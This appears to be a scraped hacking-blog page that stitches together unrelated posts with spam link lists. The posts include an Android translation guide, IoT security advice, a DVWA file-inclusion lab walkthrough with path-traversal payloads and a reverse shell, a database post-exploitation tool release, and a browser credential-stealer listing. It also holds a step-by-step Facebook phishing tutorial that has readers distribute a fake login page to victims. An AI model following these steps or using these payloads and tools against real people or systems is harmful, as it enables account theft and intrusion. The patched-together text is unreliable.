How To Automatically Translate Any Android App Into Any Language

There is the number of applications which are not having the features of translating apps to your favorite languages. This makes it difficult for the users to translate apps into their native language. Today, I am going to tell you about an application which will help you to Automatically Translate Any Android App into Any Language.

Nowadays there are around hundreds of application on play store which is having the feature of translate but some applications don't have this features. This is just because they don't have proper developers or sometimes translators.

There is an application launched by Akhil Kedia from XDA Developer which made it possible for all the users to translate the application to any language you need. This is something which everyone needs it.

Akhil Kedia built an Xposed module in which users can easily change the language of any application to whichever they like or love. Personally, we all love English language but there are peoples in many parts of the world they are suitable for other languages.

Automatically Translate Any Android App into Any Language

Automatically Translate Any Android App into Any Language

The best part about this Xposed Module is that it translates the application to any language whichever you like and there are around many languages which you can try it. The other best part about this application is that the user interface which is amazing.

In an Android application, the best thing is the user interface. This is something which helps users to download the module or application to run again and again. There are about many settings which can be changed from the application.

Read also;- How To Hack and Track any Phone

The setup process is a bit different from other applications but if you will look at the application you will definitely love it. Just because of too many settings and features available in the application and you can turn it to any language without any crashing issues of the application.

Requirements:

• Rooted Android Phone
• Xposed Framework installed on your phone.
• Android 5.0 or higher.
• Unknown Source enabled (You might be knowing it)

How to Automatically Translate Any Android App into Any Language

• Download the module called as All Trans from here: Download

• Now, after installation, it will ask you to reboot your phone to activate the module
• Now, you need to get the API Key to get it you need to sign up with Yandex first so sign up: Yandex Sign up

• Then after sign up you will get the API key just enter the API key in the All-Trans application.

• Open All Trans Application and the swipe right to Global Settings.

• Click on Enter Yandex Subscription key and then enter your key.

• In Global Settings click on Translate from and select the Language the application is already in. (Eg: English)

• Now, click on translate to and select your favorite language. This will change the language.

• Swipe left and select the applications which you need to translate and done.

• After selecting just open the application and the language is translated automatically.

Final Words:

This is the best and easy way to Automatically Translate Any Android App into Any Language. I hope you love this article.Share this article with your friends and keep visiting for more tips and tricks like this and I will meet you in the next one.

Stay Updated Tune IemHacker

Related news

• Chema Alonso Libros
• Mind Hacking
• Aprender A Hackear Desde Cero
• Curso Growth Hacking
• Geekprank Hacking
• Hacking System

THC-Hydra

"A very fast network logon cracker which support many different services. Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system." read more...

Website: http://freeworld.thc.org/thc-hydra

Related posts

• Ethical Hacking
• Reddit Hacking
• Udemy Hacking
• Hacking Marketing
• Mindset Hacking Español
• 101 Hacking
• Hacking Course

How To Secure Your Home Against "Internet Of Things" And FUD

TL;DR, most of the security news about IoT is full of FUD. Always put the risks in context - who can exploit this and what can the attacker do with it. Most story only covers the latter.

Introduction

There is rarely a day without news that another "Internet of Things" got hacked. "Smart" safes, "smart" rifles, "smart" cars, "smart" fridges, "smart" TVs, "smart" alarm systems, "smart" meters, "smart" bulbs, NAS devices, routers. These devices are getting hacked every day. Because most of these devices were never designed with security as a goal, and some of them have been never tested by security professionals, it is no surprise that these things are full of vulnerabilities.

Independent security researchers find these vulnerabilities, write a cool blog post or give a presentation about the vulnerability and the exploit, and the media forgets the constraints just for the sake of more clicks. "We are all doomed" we can read in the news, but sometimes the risks are buried deeply in technical jargon. Please note I blame the news sites here, not the researchers.

http://www.slideshare.net/danielmiessler/iot-attack-surfaces-defcon-2015

There are huge differences between the following risks:

• Attackers can directly communicate with the router (or camera) from the Internet without authentication and exploit the vulnerability. This is the worst-case scenario. For example, an automated ransomware attack against your NAS is pretty bad.
• Attackers have to position themselves in the same WAN network (e.g. Sprint mobile network in the case of Jeep hacking) to exploit the vulnerability. This is still pretty bad.
• The vulnerable code can not be triggered directly from the Internet, but tricks like CSRF can be used to exploit it (details later in this post). 
• The vulnerable code can not be triggered directly from the Internet, and it uses a protocol/port which prevents Cross Protocol Scripting. Attackers have to access the local network before exploiting this vulnerability.

As it is the case with the worst scenario, one can find a lot of devices connected to the internet. You can always find funny stuff at http://explorer.shodanhq.com/#/explore , or use the nmap screenshot script to find your own stuff :)

Network exposure

Most devices are behind an IPv4 NAT device (e.g. home router), thus can not be reached from the Internet side by default. Except when the device configures the firewall via UPNP. Or the device has a persistence cloud connection, and the cloud can send commands to the device. Or the device uses IPv6 tunneling (e.g. Teredo), thus it is reachable from the Internet. But not every vulnerability on your home network is accessible directly from the Internet. As more and more devices and networks will support IPv6, this scenario might change, but I hope most home routers will come with a default deny configuration in their IPv6 firewall module. On the other hand, scanning for IPv6 devices blindly is not feasible due to the large number of IPv6 addresses, but some tricks might work. 

If attackers can not access the device directly, there is a way to hack it through the user's browser. Just convince the victim user to visit a website, and via CSRF (Cross Site Request Forgery) and brute-forcing the device IP, it is possible to hack some devices (mostly through HTTP - if the exploit can fit into simple GET or POST commands.

If attackers can not attack the device vulnerability through the Internet directly, or via CSRF, but have connected to the same network - the network exposure shrinks significantly. And when attackers are on the same network as you, I bet you have bigger problems than the security of the IoT devices ...

Recommendations for home users

Don't buy **** you don't need

Disconnect from the power cord the IoT devices you don't need to operate 7*24. 

Disable cloud connectivity if it is not necessary. For example, I have a NAS device that can be reached through the "cloud", but I have disabled it by not configuring any default gateway for the device. I prefer connecting to my network via VPN and reach all my stuff through that.

Prevent CSRF attacks. I use two tricks. Don't use the 192.168.0.x - 192.168.10.x network at-home - use an uncommon IP range instead (e.g. 192.168.156.x is better). The second trick is I configured my Adblock plugin in my primary browser to block access to my internal network. And I use another browser whenever I want to access my internal devices. Update: On Firefox you can use NoScript ABE to block access to internal resources.

Check your router configuration:

• disable UPnP
• check the firewall settings and disable unnecessary port forwards
• check for IPv6 settings, and configure the firewall as default deny for incoming IPv6 TCP/UDP.

Change default passwords, especially for services connected to the Internet. Follow password best practices.

Run Nmap to locate new IoT in your home network :) 

Run a WiFi scan to locate new WiFi access points. Let me share a personal experience with you. I moved to a new house and brought my own WiFi router with me. I plugged it in, and forget about WiFi. Months later it turned out I had two other WiFi devices in my house - the cable modem had its own integrated WiFi with default passwords printed on the bottom, and the Set-top-box was the same - default WiFi passwords printed on the bottom. And don't forget to scan for ZigBee, Bluetooth, IrDA, FM, ...

Update your devices - in case you have a lot of free time in your hand.

Don't allow your guests to connect to your home network. Set up a separated AP for them. Imagine your nephew stealing your private photos or videos from your NAS or DNLA server.

With great power, comes great responsibility. The less device you own in your house, the less time you need to maintain those.

Read the manuals of your devices. Be aware of the different interfaces. Configure it in a secure way.

Disable Teredo protocol in case you don't need IPv6.

Stop being amazed by junk hacking.

Update: Disable WebRTC: https://www.browserleaks.com/webrtc , in Chrome you can use this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia

Update: Prevent against DNS rebind attacks via configuring a DNS server which can block internal IP addresses. OpenDNS can block internal IP, but this is not a default option, you have to configure it.

Recommendations for vendors

For vendors, I recommend at least the followings:

• Implement security during Software Development LifeCycle
• Continuous security testing and bug bounties
• Seamless auto-update
• Opt-in cloud connectivity

Recommendations for journalists

Stop FUD. Pretty please.

The questions to ask before losing your head

• who can exploit the vulnerability?
• what prerequisites do we have about the attack to successfully exploit the vulnerability? Is the attacker already in your home network? If yes, you have probably bigger problems.
• what can the attacker do when the exploit is successful?

And last but not least, don't forget that in the case of IoT devices, sometimes users are the product, not the customer. IoT is about collecting data for marketing purposes.

http://blog.open-xchange.com/2015/02/09/iot/

Related posts

• Hacking Smart Tv
• Que Estudia Un Hacker
• Paginas De Hackers
• Hacking Wireless 101 Pdf
• Hacking Time
• Hacking School
• Blackhat Hacking
• Kali Hacking
• Amiibo Hacking
• Raspberry Hacking

Difference Between Hacker, Programmer, And Developer

                There are numerous sprite debates and discussions on the differences between hackers, developers, and programmers. With most descriptions, however, there is usually a slight flaw in at least one or two serious ways. These terms are all traditionally misused and misunderstood, with many of us frequently mixing them up as an all-encompassing definition of anyone working on the Software realm.

However, if you are looking to clarify your project goals and business needs adequately, it is essential that you understand that all these terms do not all represent the same thing (although a person with the ability to program a computer can use different skills to accomplish various outcomes).

What's more, it is also quite important for you to differentiate between these three terms if you are working with software development groups and the fact that they cannot be interchanged.  This excerpt seeks to break it all down for you mainly-the vital difference between hackers, developers, and programmers, their actual tasks, as well as their relationship.

The Hacker

A hacker is a computer expert who uses his knowledge of computer networking, programming, cryptography, and databases to overcome a problem in the system. Hackers are more concerned with availing the concept as opposed to minding about the long-term quality. And although a hacker can conceptualize about how will ultimately be created while frantically writing code, the role is primarily about speed.

A hacker, as well as hacking,' are most useful in dealing with emergency circumstances or when prototyping an item. Hackers and the profession of hacking, in general, is not concerned with the ultimate effect of the code.

Hackers make things. They typically alter the things programmers create and transform them to function differently as well as also writing codes. While "hacker" can refer to any skilled technical person, the term has become associated with computer security, someone who, with their technical knowledge, uses bugs or exploits to break into computer systems.

The Programmer

A programmer is an individual equipped with the expertise to write codes. Programmers usually master in a single or multiple programming languages and boast vast knowledge on related areas also. Their roles are relatively procedural and mandate for total concentration not to mention refined skills.

A programmer is solely focused both in writing codes as well as getting features appropriately performed so that these features are accessible for integration and later use. Programming is merely the process of swinging the hammer and adequately creating the software.

Usually, it is easy to identify that an individual is in programming mode since they often have a concentrated gaze and are deep in the zone.' Programmers are normally internalizing the system they are operating as well as editing and writing pieces of something that can only best be described as a long algebra problem.'

The Developer

Developers are typically creators. However, not anyone that is an expert at writing codes can be a developer. Developers are experts at identifying ways around various problems as well as plugging together components to fulfill some requirements. These professionals solve problems or create things by adhering to a specific set of principles (design and implementation).

This set of principles includes attributes such as maintainability, performance, robustness, security, and scale among others. They solve problems in a systematic manner. Ideally, this is what distinguishes programmers, developers, and hackers.

In A Nutshell:

In all simplicity, these three professionals solve various problems using code. A programmer is an encompassing term that means a problem solver, a developer is a trained programmer (formal) who besides resolving issues achieves it in an organized and methodical manner likely instilled in the course of their formal education, and a hacker is a tinkerer/creator.

Despite their differences in individual meaning and professional capacities, these terms, however, can interrelate with each other quite effectively. In fact, it is possible for you to combine the skills to your benefit. In reality, all developers and hackers are programmers. However, despite their expertise, not many developers and programmers are creative enough to warrant an identity as hackers.

Finally, although hackers and programmers are quite impressive, they are however not experienced or educated enough to warrant consideration as developers. The similarity, however, is that all work to create code, each in their specified manner.

Ideally, anyone would work to be all the above-as creative as a hacker, though, somewhat better experienced and formally trained to design software as opposed to only hacking.

Nonetheless, even if you lack the creativity, experience, or education, or either to necessarily create a broad application, it is still worth noting that you are still ideally a programmer. And in case you did not know, solving a problem through code is by itself, a superpower!

@£√£RYTHING NT

Related articles

1. Hacker Seguridad Informática
2. Arduino Hacking
3. Hacking Wifi Windows
4. Phishing Hacking
5. Hacking Smart Tv
6. Computer Hacking
7. Hacking Y Seguridad
8. Significado De Hacker
9. Tecnicas De Hacking

Learning Web Pentesting With DVWA Part 6: File Inclusion

In this article we are going to go through File Inclusion Vulnerability. Wikipedia defines File Inclusion Vulnerability as: "A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application."
There are two types of File Inclusion Vulnerabilities, LFI (Local File Inclusion) and RFI (Remote File Inclusion). Offensive Security's Metasploit Unleashed guide describes LFI and RFI as:
"LFI vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information. If the attacker is able to place code on the web server through other means, then they may be able to execute arbitrary commands.
RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code hosted on their own machine."
In simpler terms LFI allows us to use the web application's execution engine (say php) to execute local files on the web server and RFI allows us to execute remote files, within the context of the target web server, which can be hosted anywhere remotely (given they can be accessed from the network on which web server is running).
To follow along, click on the File Inclusion navigation link of DVWA, you should see a page like this:

Lets start by doing an LFI attack on the web application.
Looking at the URL of the web application we can see a parameter named page which is used to load different php pages on the website.

http://localhost:9000/vulnerabilities/fi/?page=include.php

Since it is loading different pages we can guess that it is loading local pages from the server and executing them. Lets try to get the famous /etc/passwd file found on every linux, to do that we have to find a way to access it via our LFI. We will start with this:

../etc/passwd

entering the above payload in the page parameter of the URL:

http://localhost:9000/vulnerabilities/fi/?page=../etc/passwd

we get nothing back which means the page does not exist. Lets try to understand what we are trying to accomplish. We are asking for a file named passwd in a directory named etc which is one directory up from our current working directory. The etc directory lies at the root (/) of a linux file system. We tried to guess that we are in a directory (say www) which also lies at the root of the file system, that's why we tried to go up by one directory and then move to the etc directory which contains the passwd file. Our next guess will be that maybe we are two directories deeper, so we modify our payload to be like this:

../../etc/passwd

we get nothing back. We continue to modify our payload thinking we are one more directory deeper.

../../../etc/passwd

no luck again, lets try one more:

../../../../etc/passwd

nop nothing, we keep on going one directory deeper until we get seven directories deep and our payload becomes:

../../../../../../../etc/passwd

which returns the contents of passwd file as seen below:

This just means that we are currently working in a directory which is seven levels deep inside the root (/) directory. It also proves that our LFI is a success. We can also use php filters to get more and more information from the server. For example if we want to get the source code of the web server we can use php wrapper filter for that like this:

php://filter/convert.base64-encode/resource=index.php

We will get a base64 encoded string. Lets copy that base64 encoded string in a file and save it as index.php.b64 (name can be anything) and then decode it like this:

cat index.php.b64 | base64 -d > index.php

We will now be able to read the web application's source code. But you maybe thinking why didn't we simply try to get index.php file without using php filter. The reason is because if we try to get a php file with LFI, the php file will be executed by the php interpreter rather than displayed as a text file. As a workaround we first encode it as base64 which the interpreter won't interpret since it is not php and thus will display the text. Next we will try to get a shell. Before php version 5.2, allow_url_include setting was enabled by default however after version 5.2 it was disabled by default. Since the version of php on which our dvwa app is running on is 5.2+ we cannot use the older methods like input wrapper or RFI to get shell on dvwa unless we change the default settings (which I won't). We will use the file upload functionality to get shell. We will upload a reverse shell using the file upload functionality and then access that uploaded reverse shell via LFI.
Lets upload our reverse shell via File Upload functionality and then set up our netcat listener to listen for a connection coming from the server.

nc -lvnp 9999

Then using our LFI we will execute the uploaded reverse shell by accessing it using this url:

http://localhost:9000/vulnerabilities/fi/?page=../../hackable/uploads/revshell.php

Voila! We have a shell.

To learn more about File Upload Vulnerability and the reverse shell we have used here read Learning Web Pentesting With DVWA Part 5: Using File Upload to Get Shell. Attackers usually chain multiple vulnerabilities to get as much access as they can. This is a simple example of how multiple vulnerabilities (Unrestricted File Upload + LFI) can be used to scale up attacks. If you are interested in learning more about php wrappers then LFI CheetSheet is a good read and if you want to perform these attacks on the dvwa, then you'll have to enable allow_url_include setting by logging in to the dvwa server. That's it for today have fun.
Leave your questions and queries in the comments below.

References:

1. FILE INCLUSION VULNERABILITIES: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
2. php://: https://www.php.net/manual/en/wrappers.php.php
3. LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/
4. File inclusion vulnerability: https://en.wikipedia.org/wiki/File_inclusion_vulnerability
5. PHP 5.2.0 Release Announcement: https://www.php.net/releases/5_2_0.php

Related news

• Manual Del Hacker
• Curso Growth Hacking
• Que Es Hacking Etico
• Como Aprender A Ser Hacker
• Linux Hacking Distro
• Curso Hacker
• Hacking Hardware Tools
• Hacking Iphone
• Hacking Attacks
• Retos Hacking
• Que Es Hacker En Informatica

OWASP Announcement

🕬  OWASP Announcement:

The OWASP Foundation has been chosen to be 1 of 50 Open Source Organizations to participate in the inaugural year of the Google Season of Docs program.

The goal of Season of Docs is to provide a framework for technical writers and open source projects to work together towards the common goal of improving an open source project's documentation. For technical writers who are new to open source, the program provides an opportunity to gain experience in contributing to open source projects. For technical writers who're already working in open source, the program provides a potentially new way of working together. Season of Docs also gives open source projects an opportunity to engage more of the technical writing community.

We would like to thank the OWASP members that donate their time and knowledge as administrators and mentors. It would not be possible if not for these individuals:

Spyros, Fabio, and Konstantinos 




Related news

• Hacking Tor Funciona
• Herramientas Hacking Etico
• Que Es Growth Hacking
• Hacking Desde Cero
• Chema Alonso Libros
• Curso Ethical Hacking
• Ethical Hacking Curso
• Hacking Health
• Hacking Raspberry Pi
• Hacking Bluetooth Speaker
• Curso Seguridad Informatica

The Pillager 0.7 Release

I spent the last couple days recoding the Pillager, getting rid of bugs, optimizing code, making it more extendable and more solid overall. So this post is to release the new code.  However, with that being said, the Pillager is in mass revision right now and I added some more developers to the team to add a whole host of new database attacking features as well as moving past databases and into other areas of post exploitation pillaging. Soon to be released..  As usual this tool and any tool i create is based on my issues when performing penetration tests and solves those problems.. If you have any insight or comments i will certainly take them into consideration for future releases.

For now check out Version 0.7.. Named searches and Data searches via external config files are now functioning properly as well as other bugs fixed along the way... Drop this in a BT5 VM and make sure you have your DB python stuff installed per the help docs and you should be good to go.  If you are looking to use oracle you are going to have to install all the oracle nonsense from oracle or use a BT4r2 vm which has most of the needed drivers minus cxoracle which will need to be installed.

http://consolecowboys.org/pillager/pillage_0.7.zip



Ficti0n$ python pillager.py
 
[---] The Database Pillager (DBPillage) [---]
[---] CcLabs Release [---]
[---] Authors: Ficti0n, [---]
[---] Contributors: Steponequit [---]
[---] Version: 0.7 [---]
[---] Find Me On Twitter: ficti0n [---]
[---] Homepage: http://console-cowboys.blogspot.com [---]

Release Notes:
 --Fixed bugs and optimized code
 --Added Docstrings
 --Fixed Named and Data searches from config files                 

About:
The Database Pillager is a multiplatform database tool for searching and browsing common
database platforms encountered while penetration testing. DBPillage can be used to search
for PCI/HIPAA data automatically or use DBPillage to browse databases,display data.
and search for specified tables/data instances.
DBpillage was designed as a post exploitation pillaging tool with a goal of targeted
extraction of data without the use of database platform specific GUI based tools that
are difficult to use and make my job harder.

Supported Platforms:
        --------------------
-Oracle
-MSSQL
-MYSQL
        -PostGreSQL
     

        Usage Examples:
        ************************************************************************
        
        For Mysql Postgres and MsSQL pillaging:
        ---------------------------------------
        python dbPillage -a [address] -d [dbType] -u [username] -p [password]
        
        
        For Oracle pillaging you need a SID connection string:
        ------------------------------------------------------
        python dbPillage-a [address]/[sid] -d [dbType] -u [username] -p [password]
        

        Grab some hashes and Hipaa specific:(Default is PCI)
        ------------------------------------
        python dbPillage -a [address] -d [dbType] -u [username] -p [password] --hashes -s hipaa


Drop into a SQL CMDShell:
-------------------------
        python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -q

Config file specified searches:
-------------------------------
Search for data Items from inputFiles/data.txt:
        python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -D

Search for specific table names from inputFiles/tables.txt:
python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -N

     
     
        Switch Options:
        ---------------------
        -# --hashes = grab database password hashes
        -l --limit  = limit the amount of rows that are searched or when displaying data (options = any number)
        -s --searchType = Type of data search you want to perform (options:pci, hipaa, all)(PCI default)
        -u --user = Database servers username
        -p --pass = Password for the database server
        -a --address = Ipaddress of the database server
        -d --database = The database type you are pillageing (options: mssql,mysql,oracle,postgres)
        -r --report = report format (HTML, XML, screen(default))
        -N --nameSearch = Search via inputFiles/tables.txt
        -D --dataSearch = Targeted data searches per inputFiles/data.txt
-q --queryShell = Drop into a SQL CMDshell in mysql or mssql
     
     
        Prerequisites:
        -------------
        python v2  (Tested on Python 2.5.2 BT4 R2 and BT5 R3 - Oracle stuff on BT4r2 only unless you install the drivers from oracle)
        cx_oracle (cx-oracle.sourceforge.net)
        psycopg2  (initd.org/psycopg/download/)
        MySQLdb   (should be on BT by default)
        pymssql   (should be on BT by default)
     

More information

• Hacking Con Python
• Python Desde 0 Hasta Hacking - Máster En Hacking Con Python
• Libros Hacking Pdf
• Que Es Un Hacker
• Que Es Growth Hacking
• Nfc Hacking

HOW TO HACK A FACEBOOK ACCOUNT? STEP BY STEP

Phishing is the way to obtain sensitive information such as usernames, passwords, and credit card details or any other confidential information, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. Phishing is typically carried out by several ways like email spoofing or instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are almost identical to the legitimate one. In this tutorial, I will be showing how to hack a facebook account through phishing.

SO, HOW TO HACK A FACEBOOK ACCOUNT?

There are few techniques by which you can hack a facebook account but here the easiest way we'll discuss.

REQUIREMENTS

1. Phisher Creator ( Fake page generator)
2. Hosting ( To host a fake page). Either you can purchase one or also can use free hosting like 110mb.com. But in free hosting, the account will be suspended after a few logins.

STEPS TO FOLLOW

1. Download phisher creator and run it.
2. As you run it, you'll see a screen like the shown below. Here you can type the fields as I have done. 
3. Once you hit the Create Phisher button, it'll create a fake facebook index page and fb_login.php file in the output folder.
4. Now you need to upload these both files index.html and fb_login.php to the hosting account.
5. After uploading the file, open the index.html file path. It will open up a page like same facebook page as you can see below.
6. We're all done, now we just need to copy the URL of our fake page and distribute it to the victims, you just have to trick them with your social engineering that how you convenience them to open this URL to login facebook. Once someone tries to login through your fake facebook page URL, you'll get their account username and password in the log_file.txt in the same directory of hosting where you have uploaded index.php and fb_login.php.

Hope it'll work fine for you and you have learned how to hack a facebook account. If you find any question or query related to this, feel free to comment below or you can also follow another way that might work well for you to hack facebook account.

Related news

1. Hacking Pdf
2. Growth Hacking Examples
3. Como Ser Hacker
4. Fake Hacking

Wafw00F: The Web Application Firewall Fingerprinting Tool

How does wafw00f work?
   To do its magic, WAFW00F does the following steps:

• Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions.
• If that is not successful, wafw00f sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
• If that is also not successful, wafw00f analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to wafw00f's attacks.

   For further details, check out the source code on EnableSecurity's main repository.

What does it detect? WAFW00F can detect a number of firewalls, a list of which is as below:

wafw00f's installation
   If you're using Debian-based distro, enter this commands to install wafw00f: sudo apt update && sudo apt install wafw00f

   But if you're using another Linux distro, enter these commands to install wafw00f:

How to use wafw00f?
   The basic usage is to pass an URL as an argument. Example:

Final Words to you
   Questions? Pull up an issue on GitHub Issue Tracker or contact to EnableSecurity.
   Pull requests, ideas and issues are highly welcome. If you wish to see how WAFW00F is being developed, check out the development board.

   Some useful links:

• Documentation/Wiki
• Pypi Package Repository

   Presently being developed and maintained by:

• Sandro Gauci (@SandroGauci)
• Pinaki Mondal (@0xInfection)

Download wafw00f

Related articles

1. Hacking Tools
2. Que Hay Que Estudiar Para Ser Hacker
3. Linux Hacking Distro
4. Hacking Wifi
5. Hacking Apps

Adamantium-Thief - Decrypt Chromium Based Browsers Passwords, Cookies, Credit Cards, History, Bookmarks

Get chromium browsers: passwords, credit cards, history, cookies, bookmarks.
Chrome 80 > is supported!

Examples:

Get passwords from browsers:

Stealer.exe PASSWORDS

Get credit cards from browsers:

Stealer.exe CREDIT_CARDS

Get history from browsers:

Stealer.exe HISTORY

Get bookmarks from browsers:

Stealer.exe BOOKMARKS

Get cookies from browsers:

Stealer.exe COOKIES

Browsers list:

• Google Chrome
• Opera
• Chromium
• Brave-Browser
• Epic Privacy Browser
• Amigo
• Vivaldi
• Orbitum
• Atom
• Kometa
• Comodo Dragon
• Torch
• Slimjet
• 360Browser
• Maxthon3
• K-Melon
• Sputnik
• Nichrome
• CocCoc Browser
• Uran
• Chromodo
• Yandex (old)

Download Adamantium-Thief

via KitPloit

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More articles

• Growth Hacking Pdf
• Ingeniería Social El Arte Del Hacking Personal
• Hacking Net
• Codigo Hacker
• Hacking 2018
• Hacking Aves
• Growth Hacking Que Es
• Hacking Bluetooth Speaker
• Hacker Definicion